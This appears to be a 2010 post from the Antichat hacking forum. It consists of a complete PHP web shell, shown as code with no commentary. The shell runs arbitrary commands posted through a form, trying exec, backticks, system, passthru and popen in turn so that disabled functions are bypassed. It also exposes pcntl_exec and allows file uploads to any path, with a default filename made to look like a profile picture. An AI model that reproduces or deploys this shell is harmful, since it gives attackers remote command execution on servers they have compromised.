10.05.2010, 21:55
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
PHP код:
<font face="monospace,terminal" size="-1"><pre>
<?php
ob_end_clean();
ob_start();
$disablefuncs = array();
function myshellexec($cmd) {
global $disablefuncs;
if (empty($cmd)) {
return '';
}
$result = '';
if (is_callable('exec') and !in_array('exec', $disablefuncs)) {
exec($cmd, $result);
$result = join("\n", $result);
} elseif (($result = `$cmd`) !== FALSE) {
} elseif (is_callable('system') and !in_array('system')) {
ob_start();
system($cmd);
$result = ob_get_contents();
ob_clean();
} elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) {
ob_start();
passthru($cmd);
$result = ob_get_contents();
ob_clean();
} elseif (is_resource($fp = popen($cmd,"r"))) {
while(!feof($fp)) {
$result .= fread($fp, 1024);
}
pclose($fp);
} else {
$result = 'Shit. Can\'t execute command.';
}
return $result;
}
if (is_callable('ini_get')) {
$disablefuncs = ini_get("disable_functions");
if (!empty($disablefuncs)) {
$disablefuncs = str_replace(' ', '', $disablefuncs);
$disablefuncs = explode(',', $disablefuncs);
} else {
$disablefuncs = array();
}
}
if (isset($_POST['execl'])) {
echo $_POST['execl']. '<br>';
echo myshellexec($_POST['execl']);
}
if (isset($_POST['pcntl_exec'])) {
pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']);
}
if (isset($_FILES['upfile'])) {
if (is_uploaded_file($_FILES['upfile']['tmp_name'])) {
move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']);
echo '<b>Uploaded!</b>';
}
}
?><br>
</pre>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit">
</form><br>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit">
</form>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">
upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit">
</form>
<script>document.getElementById("bash").focus();</script>
</font>
<?php
$text = str_replace("\n", '<br />', ob_get_contents());
ob_end_clean();
echo $text;
?>
|
|
|